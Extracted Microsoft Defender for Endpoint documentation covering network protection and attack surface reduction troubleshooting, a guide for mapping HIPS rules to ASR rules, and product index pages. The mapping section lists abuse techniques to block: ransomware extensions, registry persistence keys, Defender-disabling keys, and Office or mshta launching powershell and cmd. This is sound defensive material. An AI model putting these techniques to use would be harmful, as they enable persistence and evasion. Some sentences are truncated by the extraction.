designed to demo the feature. All website connections are allowed by network
protection but an event is logged to indicate any connection that would be blocked if
network protection were enabled.
1. Set network protection to Audit mode.
PowerShell
2. Perform the connection activity that is causing an issue (for example, attempt to
visit the site, or connect to the IP address you do or don't want to block).
3. Review the network protection event logs to see if the feature would block the
connection if it were set to Enabled.
If network protection isn't blocking a connection that you're expecting it should

block, enable the feature.
PowerShell
Report a false positive or false negative

If you've tested the feature with the demo site and with audit mode, and network
protection is working on preconfigured scenarios, but isn't working as expected for a
specific connection, use the Windows Defender Security Intelligence web-based
submission form to report a false negative or false positive for network protection.
With an E5 subscription, you can also provide a link to any associated alert.
See Address false positives/negatives in Microsoft Defender for Endpoint.
Add exclusions
The current exclusion options are:
1. Setting up a custom allow indicator.
2. Using IP exclusions: Add-MpPreference -ExclusionIpAddress 192.168.1.1 .

3. Excluding an entire process. For more information, see Microsoft Defender
Collect diagnostic data for file submissions

When you report a problem with network protection, you're asked to collect and submit
diagnostic data for Microsoft support and engineering teams to help troubleshoot
issues.
1. Open an elevated command prompt and change to the Windows Defender

directory:
Console
cd c:\program files\windows defender
2. Run this command to generate the diagnostic logs:
Console
mpcmdrun -getfiles
3. Attach the file to the submission form. By default, diagnostic logs are saved at
Resolve connectivity issues with network

protection (for E5 customers)
Due to the environment where network protection runs, Microsoft is unable to see your
operating system proxy settings. In some cases, network protection clients are unable to
reach the cloud service. To resolve connectivity issues with network protection, configure
one of the following registry keys so that network protection becomes aware of the
proxy configuration:
PowerShell
Set-MpPreference -ProxyServer <proxy IP address: Port>
---OR---
PowerShell
Set-MpPreference -ProxyPacUrl <Proxy PAC url>
You can configure the registry key by using PowerShell, Microsoft Configuration
Manager, or Group Policy. Here are some resources to help:
Working with Registry Keys

Configure custom client settings for Endpoint Protection
Use Group Policy settings to manage Endpoint Protection
See also
Network protection
Address false positives/negatives in Defender for Endpoint
 Tip
Feedback

Troubleshoot attack surface reduction
rules
Article • 02/16/2024
Applies to:

When you use attack surface reduction rules you might run into issues, such as:
A rule blocks a file, process, or performs some other action that it shouldn't (false
positive)
A rule doesn't work as described, or doesn't block a file or process that it should
(false negative)
There are four steps to troubleshooting these problems:
1. Confirm prerequisites
2. Use audit mode to test the rule
3. Add exclusions for the specified rule (for false positives)
Attack surface reduction rules only work on devices with the following conditions:
Endpoints are running Windows 10 Enterprise or later.
Endpoints are using Microsoft Defender Antivirus as the sole antivirus protection
app. Using any other antivirus app causes Microsoft Defender Antivirus to disable
itself.
Real-time protection is enabled.
Audit mode isn't enabled. Use Group Policy to set the rule to Disabled (value: 0) as
described in Enable attack surface reduction rules.
If these prerequisites are met, proceed to the next step to test the rule in audit mode.
Use audit mode to test the rule
Follow these instructions in Use the demo tool to see how attack surface reduction rules
work to test the specific rule you're encountering problems with.
1. Enable audit mode for the specific rule you want to test. Use Group Policy to set
the rule to Audit mode (value: 2) as described in Enable attack surface reduction
rules. Audit mode allows the rule to report the file or process, but allows it to run.
2. Perform the activity that is causing an issue (for example, open or execute the file
or process that should be blocked but is being allowed).
3. Review the attack surface reduction rule event logs to see if the rule would block
the file or process if the rule were set to Enabled.
If a rule isn't blocking a file or process that you're expecting it should block, first check if
audit mode is enabled.
Audit mode might be enabled for testing another feature, or by an automated

PowerShell script, and might not be disabled after the tests were completed.
If you've tested the rule with the demo tool and with audit mode, and attack surface
reduction rules are working on preconfigured scenarios, but the rule isn't working as
expected, proceed to either of the following sections based on your situation:
1. If the attack surface reduction rule is blocking something that it shouldn't block
(also known as a false positive), you can first add an attack surface reduction rule
exclusion.
2. If the attack surface reduction rule isn't blocking something that it should block
(also known as a false negative), you can proceed immediately to the last step,
collecting diagnostic data and submitting the issue to us.
Add exclusions for a false positive

If the attack surface reduction rule is blocking something that it shouldn't block (also
known as a false positive), you can add exclusions to prevent attack surface reduction
rules from evaluating the excluded files or folders.
To add an exclusion, see Customize Attack surface reduction.
） Important
You can specify individual files and folders to be excluded, but you cannot specify
individual rules. This means any files or folders that are excluded will be excluded
from all ASR rules.
Report a false positive or false negative

Use the Microsoft Security Intelligence web-based submission form to report a false
negative or false positive for network protection. With a Windows E5 subscription, you
can also provide a link to any associated alert.
Collect diagnostic data for file submissions

When you report a problem with attack surface reduction rules, you're asked to collect
and submit diagnostic data that can be used by Microsoft support and engineering
teams to help troubleshoot issues.
1. Open an elevated command prompt and change to the Windows Defender

directory:
Console
cd "c:\program files\Windows Defender"
2. Run this command to generate the diagnostic logs:
Console
mpcmdrun -getfiles
3. By default, they're saved to C:\ProgramData\Microsoft\Windows

Defender\Support\MpSupportFiles.cab . Attach the file to the submission form.
Related articles
 Tip
Feedback

Migrating from a non-Microsoft HIPS to
attack surface reduction rules
Article • 02/22/2024
Applies to:

This article helps you to map common rules to Microsoft Defender for Endpoint.
Scenarios when migrating from a non-Microsoft

HIPS product to attack surface reduction rules
Block creation of specific files

Applies to- All processes
Operation- File Creation
Examples of Files/Folders, Registry Keys/Values, Processes, Services- *.zepto, *.odin,
*.locky, *.jaff, *.lukitus, *.wnry, *.krab
Attack Surface Reduction rules- attack surface reduction rules block the attack
techniques and not the Indicators of Compromise (IOC). Blocking a specific file
extension isn't always useful, as it doesn't prevent a device from compromise. It only
partially thwarts an attack until attackers create a new type of extension for the
payload.
Other recommended features- Having Microsoft Defender Antivirus enabled, along
with Cloud Protection and Behavior Analysis is highly recommended. We recommend
that you use other prevention, such as the attack surface reduction rule Use advanced
protection against ransomware, which provides a greater level of protection against
ransomware attacks. Furthermore, Microsoft Defender for Endpoint monitors many of
these registry keys, such as ASEP techniques, which trigger specific alerts. The registry
keys used require a minimum of Local Admin or Trusted Installer privileges can be
modified. It's recommended to use a locked down environment with minimum
administrative accounts or rights. Other system configurations can be enabled,
including Disable SeDebug for nonrequired roles that's part of our wider security
recommendations.
Block creation of specific registry keys

Applies to- All Processes
Processes- N/A
Operation- Registry Modifications
Examples of Files/Folders, Registry Keys/Values, Processes, Services-
\Software,HKCU\Environment\UserInitMprLogonScript,HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Accessibility\ATs*\StartExe, HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options*\Debugger,
HKEY_CURRENT_USER\Software\Microsoft\HtmlHelp Author\location,
HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\SilentProcessExit*\MonitorProcess
Attack Surface Reduction rules- attack surface reduction rules block the attack
techniques and not the Indicators of Compromise (IOC). Blocking a specific file
extension isn't always useful, because it doesn't prevent a device from compromise. It
only partially thwarts an attack until attackers create a new type of extension for the
payload.
Other recommended features- Having Microsoft Defender Antivirus enabled, along
with Cloud Protection and Behavior Analysis is highly recommended. We recommend
you use extra prevention, such as the attack surface reduction rule Use advanced
protection against ransomware. This provides a greater level of protection against
ransomware attacks. Furthermore, Microsoft Defender for Endpoint monitors several
of these registry keys, such as ASEP techniques, which trigger specific alerts.
Additionally, the registry keys used require a minimum of Local Admin or Trusted
Installer privileges can be modified. It's recommended to use a locked down
environment with minimum administrative accounts or rights. Other system
configurations can be enabled, including Disable SeDebug for nonrequired roles that's
part of our wider security recommendations.
Block untrusted programs from running from removable

drives
Applies to- Untrusted Programs from USB
Processes- *
Operation- Process Execution
*Examples of Files/Folders, Registry Keys/Values, Processes, Services:-
Attack Surface Reduction rules- attack surface reduction rules have a built-in rule to
prevent the launch of untrusted and unsigned programs from removable drives: Block
untrusted and unsigned processes that run from USB, GUID b2b3f03d-6a65-4f7b-a9c7-
1c7ef74a9ba4.
Other recommended features- Please explore more controls for USB devices and
other removable media using Microsoft Defender for Endpoint:How to control USB
devices and other removable media using Microsoft Defender for Endpoint.
Block Mshta from launching certain child processes
Applies to- Mshta
Processes- mshta.exe
Examples of Files/Folders, Registry Keys/Values, Processes, Services- powershell.exe,
cmd.exe, regsvr32.exe
Attack Surface Reduction rules- attack surface reduction rules don't contain any
specific rule to prevent child processes from mshta.exe. This control is within the remit
of Exploit Protection or Windows Defender Application Control.
Other recommended features- Enable Windows Defender Application Control to
prevent mshta.exe from being executed altogether. If your organization requires
mshta.exe for line of business apps, configure a specific Windows Defender Exploit
Protection rule, to prevent mshta.exe from launching child processes.
Block Outlook from launching child processes

Applies to- Outlook
Processes- outlook.exe
Examples of Files/Folders, Registry Keys/Values, Processes, Services- powershell.exe
prevent Office communication apps (Outlook, Skype, and Teams) from launching child
processes: Block Office communication application from creating child processes, GUID
26190899-1602-49e8-8b27-eb1d0a1ce869.
Other recommended features- We recommend enabling PowerShell constrained
language mode to minimize the attack surface from PowerShell.
Block Office Apps from launching child processes

Applies to- Office
Processes- winword.exe, powerpnt.exe, excel.exe
Examples of Files/Folders, Registry Keys/Values, Processes, Services- powershell.exe,
cmd.exe, wscript.exe, mshta.exe, EQNEDT32.EXE, regsrv32.exe
prevent Office apps from launching child processes: Block all Office applications from
creating child processes, GUID d4f940ab-401b-4efc-aadc-ad5f3c50688a.
Other recommended features- N/A
Block Office Apps from creating executable content

Applies to- Office
Processes- winword.exe, powerpnt.exe, excel.exe
C:\Users*\AppData**.exe, C:\ProgramData**.exe, C:\ProgramData**.com,
C:\UsersAppData\Local\Temp**.com, C:\Users\Downloads**.exe,
C:\Users*\AppData**.scf, C:\ProgramData**.scf, C:\Users\Public*.exe,
C:\Users*\Desktop***.exe
Attack Surface Reduction rules- N/A.
Block Wscript from reading certain types of files

Applies to- Wscript
Processes- wscript.exe
Operation- File Read
C:\Users*\AppData**.js, C:\Users*\Downloads**.js
Attack Surface Reduction rules- Due to reliability and performance issues, attack
surface reduction rules don't have the capability to prevent a specific process from
reading a certain script file type. We do have a rule to prevent attack vectors that
might originate from these scenarios. The rule name is Block JavaScript or VBScript
from launching downloaded executable content (GUID d3e037e1-3eb8-44c8-a917-
57927947596d) and the Block execution of potentially obfuscated scripts (GUID *
5beb7efe-fd9a-4556-801d-275e5ffc04cc*).
Other recommended features- Though there are specific attack surface reduction
rules that mitigate certain attack vectors within these scenarios, it's important to
mention that AV is able by default to inspect scripts (PowerShell, Windows Script Host,
JavaScript, VBScript, and more) in real time, through the Antimalware Scan Interface
(AMSI). More info is available here: Antimalware Scan Interface (AMSI).
Block launch of child processes

Applies to- Adobe Acrobat
Processes- AcroRd32.exe, Acrobat.exe
Examples of Files/Folders, Registry Keys/Values, Processes, Services- cmd.exe,
powershell.exe, wscript.exe
Attack Surface Reduction rules- attack surface reduction rules allow blocking Adobe
Reader from launching child processes. The rule name is Block Adobe Reader from
creating child processes, GUID 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c.
Other recommended features- N/A
Block download or creation of executable content
Applies to- CertUtil: Block download or creation of executable
Processes- certutil.exe
Examples of Files/Folders, Registry Keys/Values, Processes, Services- *.exe
Attack Surface Reduction rules- attack surface reduction rules don't support these
scenarios because they're a part of Microsoft Defender Antivirus protection.
Other recommended features- Microsoft Defender Antivirus prevents CertUtil from
creating or downloading executable content.
Block processes from stopping critical System components

Processes- *
Operation- Process Termination
Examples of Files/Folders, Registry Keys/Values, Processes, Services- MsSense.exe,
MsMpEng.exe, NisSrv.exe, svchost.exe*, services.exe, csrss.exe, smss.exe, wininit.exe,
and more.
Attack Surface Reduction rules- attack surface reduction rules don't support these
scenarios because they're protected with Windows built-in security protections.
Other recommended features- ELAM (Early Launch AntiMalware), PPL (Protection
Process Light), PPL AntiMalware Light, and System Guard.
Block specific launch Process Attempt

Applies to- Specific Processes
Processes- Name your Process
Examples of Files/Folders, Registry Keys/Values, Processes, Services- tor.exe,
bittorrent.exe, cmd.exe, powershell.exe, and more
Attack Surface Reduction rules- Overall, attack surface reduction rules aren't
designed to function as an Application manager.
Other recommended features- To prevent users from launching specific processes or
programs, it's recommended to use Windows Defender Application Control. Microsoft
Defender for Endpoint File and Cert indicators, can be used in an Incident Response
scenario (shouldn't be seen as an application control mechanism).
Block unauthorized changes to Microsoft Defender

Antivirus configurations
Processes- *
Operation- Registry Modifications
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware,
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Policy
Manager\AllowRealTimeMonitoring, and so on.
Attack Surface Reduction rules- attack surface reduction rules don't cover these
scenarios because they're part of the Microsoft Defender for Endpoint built-in
protection.
Other recommended features- Tamper Protection (opt-in, managed from Intune)
prevents unauthorized changes to DisableAntiVirus, DisableAntiSpyware,
DisableRealtimeMonitoring, DisableOnAccessProtection, DisableBehaviorMonitoring,
and DisableIOAVProtection registry keys (and more).
See also

 Tip
Feedback

Learn about the robust security solutions in Microsoft Defender XDR so that you can
better protect your enterprise across attack surfaces.
ｅ OVERVIEW
What is Microsoft Defender XDR?
ｈ WHAT'S NEW
What's new in Microsoft Defender XDR
ｑ VIDEO
Overview video
Evaluate capabilities
ｂ GET STARTED
Create a trial lab
Run pilot project in production
Get started
ｂ GET STARTED
Get started with Microsoft Defender XDR
｀ DEPLOY
Turn on Microsoft Defender XDR
Deploy supported services

Setup guides for Microsoft Defender XDR
ｅ OVERVIEW
What is Microsoft Defender for Identity?
Microsoft Defender for Identity architecture
ｅ OVERVIEW
What is Microsoft Defender for Office 365?
Microsoft Defender for Office 365 service description
Microsoft Defender for Office 365 in Microsoft Defender XDR
Redirecting Microsoft Defender for Office 365 in Microsoft Defender XDR
ｅ OVERVIEW
What is Microsoft Defender for Endpoint?
Defender for Endpoint in Microsoft Defender XDR
Redirecting Defender for Endpoint in Microsoft Defender XDR
ｅ OVERVIEW
What is Microsoft Defender for Cloud Apps?
Get started with Microsoft Defender for Cloud Apps

Manage incidents and alerts
ｅ OVERVIEW
Track and respond to emerging threats
Automated investigation and response
Hunt for threats
Reference
ｉ REFERENCE
Microsoft Defender XDR APIs

documentation
Learn about the robust security solutions in Defender for Office 365 to better protect
your email and collaboration tools.
Defender for Office 365 & Exchange Online Protection
ｅ OVERVIEW
Microsoft Defender for Office 365 overview
Exchange Online Protection overview
EOP & Defender for Office 365 security comparison
What's new in Defender for Office 365
Get started with Defender for Office 365
ｂ GET STARTED
Get started with Defender for Office 365
Preset security policies in EOP and Defender for Office 365
Recommended policy settings for EOP and Defender for Office 365
Configuration analyzer in EOP and Defender for Office 365
Evaluate Defender for Office 365
ｃ HOW-TO GUIDE
Try Defender for Office 365
Migrate to Defender for Office 365
Configure email authentication

ｃ HOW-TO GUIDE
Set up SPF to help prevent spoofing
Use DKIM to validate outbound email sent from your custom domain
Use DMARC to validate email
Configure trusted ARC sealers
Investigate and respond
ｃ HOW-TO GUIDE
Defender for Office 365 SecOps guide

documentation
Microsoft Defender for Identity cloud service helps protect your enterprise hybrid
environments from multiple types of advanced targeted cyber attacks and insider
threats.
About Microsoft Defender for Identity
ｅ OVERVIEW
What is Microsoft Defender for Identity?
Ｙ ARCHITECTURE
Defender for Identity architecture
ｈ WHAT'S NEW
Releases
Check out Defender for Identity alerts
ｂ GET STARTED
Security alerts
Manage security alerts
Health issues
Explore different ways to use Defender for Identity
ｃ HOW-TO GUIDE
Security posture assessments
Configure detection exclusions
Search and filter monitored activities

Set entity tags
Advanced Threat Analytics (ATA) to Defender for Identity migration
Investigate threats
ｇ TUTORIAL
Investigate assets
Investigate lateral movement paths
Remediation actions
Resources and support
ｉ REFERENCE
Support
Defender for Identity data security and privacy

documentation
Microsoft Defender for Cloud Apps is a Cloud Access Security Broker (CASB) that
operates on multiple clouds. It provides rich visibility, control over data travel, and
sophisticated analytics to identify and combat cyberthreats across all your cloud
services.
About Defender for Cloud Apps
ｅ OVERVIEW
What is Defender for Cloud Apps?
Top SaaS app use cases
SaaS Security
ｈ WHAT'S NEW
Releases
ｑ VIDEO
Deployment videos
Get started
ｆ QUICKSTART
Get started with Defender for Cloud Apps
ｉ REFERENCE
Using the Defender for Cloud Apps REST API
Investigate anomaly detection alerts
Explore our top use cases

ｇ TUTORIAL
Detect and manage suspicious activities
Investigate risky users
Investigate risky OAuth apps
Protect any app in your organization in real time
Block download of sensitive information
Protect files with admin quarantine
Apply sensitivity labels from Microsoft Purview Information Protection
Extend governance to endpoint remediation
Concepts
ｐ CONCEPT
Protect apps with Conditional Access App Control
Working with the dashboard
Working with App risk scores
Working with discovered apps
Protect connected apps
Manage app governance
Best practices
ｂ GET STARTED
Discover and assess cloud apps
Apply cloud governance policies
Limit exposure of shared data and enforce collaboration policies
Discover, classify, label, and protect regulated and sensitive data stored in the cloud
Enforce DLP and compliance policies for data stored in the cloud
Block and protect download of sensitive data to unmanaged or risky devices

Secure collaboration with external users by enforcing real-time session controls
Detect cloud threats, compromised accounts, malicious insiders, and ransomware
Use the audit trail of activities for forensic investigations
Secure IaaS services and custom apps
Discover and control Shadow IT
ｇ TUTORIAL
Discover and identify Shadow IT
Evaluate and analyze
Manage your apps
ｐ CONCEPT
Working with the dashboard
Working with the discovered apps
Working with App risk scores
｀ DEPLOY
Deploy Cloud Discovery
ｃ HOW-TO GUIDE
Integrate with Microsoft Defender for Endpoint
Cloud Discovery enrichment
ｉ REFERENCE
Discover and assess cloud apps
ｑ VIDEO
Shadow IT discovery beyond the corporate network
ｄ TRAINING
Read our e-books
Explore Microsoft 365, a complete solution that includes Defender for Cloud Apps
ｑ VIDEO
Watch our webinars

Simple, comprehensive endpoint security to help you protect your small or medium-
sized business, so you can focus on what matters. Protect your computers, tablets, and
phones with enterprise-grade security at an affordable price. Defender for Business is
available as a standalone subscription or as part of Microsoft 365 Business Premium. See
what's new at https://aka.ms/cybersecuritysmb.
Overview
ｅ OVERVIEW
What is Defender for Business?
What's new in Defender for Business?
Resources for partners
ｅ OVERVIEW
Resources for Microsoft partners (security guide and checklist)
Integration with Microsoft 365 Lighthouse
Get started
ｂ GET STARTED
Interactive guide - Get started with Microsoft Defender for Business
Get Defender for Business
See the trial user guide
Turn on preview features
Setup information
｀ DEPLOY
Setup and configuration overview
Onboard devices
Set up and review security policies
Operations and maintenance
ｃ HOW-TO GUIDE
Maintain your environment
View your reports
Help and more resources
ｃ HOW-TO GUIDE
How to get help or contact support
Microsoft Security Intelligence

Microsoft Defender Vulnerability
Management
Reduce cyber risk with continuous vulnerability discovery and assessment, risk-based
prioritization, and remediation.
Overview
ｅ OVERVIEW
What is Microsoft Defender Vulnerability Management?
Compare Microsoft Defender Vulnerability Management offerings
Get started
ｂ GET STARTED
Get Defender Vulnerability Management
Discover and explore inventories
ｃ HOW-TO GUIDE
Device inventory
Software inventory
Browser extensions
Certificate inventory
Hardware and firmware assessment
Detect and assess threats
ｃ HOW-TO GUIDE
Dashboard insights
Exposure score
Security baselines
Hunt for exposed devices
Identify risk and prioritize remediation
ｃ HOW-TO GUIDE
Address security recommendations
Network share configuration assessment
Exceptions for security recommendations
Plan for end-of-support software
Mitigate zero-day vulnerabilities
Event timeline
Track and mitigate remediation activities
ｃ HOW-TO GUIDE
Remediate vulnerabilities
Block vulnerable applications
Vulnerable devices report

Microsoft 365 Security Defender Endpoint O365 Worldwide

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Microsoft 365 Security Defender Endpoint O365 Worldwide

Uploaded by

Copyright:

Available Formats

Tell us about your PDF experience.

Microsoft Defender for Endpoint

Microsoft Defender for Endpoint

What is Microsoft Defender for Endpoint?

What is Defender for Endpoint plan 1?

What's new in Microsoft Defender for Endpoint

Announcing Microsoft Defender for Endpoint Plan 1

Evaluate & deploy the service

Evaluate Microsoft Defender for Endpoint

Plan your deployment

Onboard supported devices

Set up and configure Defender for Endpoint Plan 1

Endpoint detection and response

Behavioral blocking and containment

Automated investigation and response (AIR)

Microsoft Threat Experts

Use Microsoft Defender for Endpoint on other platforms

Microsoft Defender for Endpoint on Mac

Microsoft Defender for Endpoint on iOS

Microsoft Defender for Endpoint on Linux

Microsoft Defender for Endpoint on Android

Management and APIs

Microsoft Defender Vulnerability Management

Attack surface reduction

Microsoft Defender for Endpoint

Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to

Threat intelligence: Generated by Microsoft hunters, security teams, and

Microsoft Defender for Endpoint

Core Defender Attack Next- Endpoint Automated Microsoft

Centralized configuration and administration, APIs

Microsoft Defender XDR

Core Defender Vulnerability Management

Built-in core vulnerability management capabilities use a modern risk-based approach

For more information on the different vulnerability management capabilities available to

Attack surface reduction

Endpoint detection and response

Automated investigation and remediation

In conjunction with being able to quickly respond to advanced attacks, Microsoft

Microsoft Secure Score for Devices

Microsoft Threat Experts

Centralized configuration and administration, APIs

Integrate Microsoft Defender for Endpoint into your existing workflows.

Integration with Microsoft solutions

Microsoft Defender for Cloud

Microsoft Defender XDR

Provide product feedback

Microsoft Defender XDR for Endpoint

Microsoft Defender for Endpoint is an enterprise endpoint security platform designed to

Verify explicitly Use least privilege access Assume breach

Endpoint behavioral sensors: Sensors embedded in Windows 10 and 11 collect

Threat protection for Zero Trust

Core Defender Vulnerability Management, which uses a modern risk-based

Provide product feedback

What is Defender for Endpoint?

Endpoint behavioral sensors: Embedded in Windows, these sensors collect and

Threat intelligence: Generated by Microsoft hunters and security teams, and

Microsoft Defender for Endpoint

Core Defender Attack Next- Endpoint Automated Microsoft

Centralized configuration and administration, APIs

Microsoft Defender XDR

Let's get started!

Set up your trial

Step 1: Confirm your license state